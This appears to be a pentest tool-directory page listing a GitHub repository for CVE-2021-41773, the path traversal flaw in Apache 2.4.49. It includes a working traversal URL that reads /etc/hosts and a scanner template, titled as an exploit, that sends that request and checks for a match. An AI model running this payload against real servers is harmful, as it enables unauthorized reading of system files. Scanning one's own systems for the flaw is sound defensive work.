Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41773 — CVE-2021-41773 | Kitploit
Tools/GitHubGitHub/numanturle/cve-2021-41773
Vulnerability ScannersExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubnumanturle/cve-2021-41773

CVE-2021-41773

CVE-2021-41773

View Repository
844 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

https://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts

root@kitploit:~
id: CVE-2021-41773

info:
  name: Apache 2.4.49 Exploit
  author: numanturle
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "127.0.0.1"

      - type: status
        status:
          - 200
Download Tool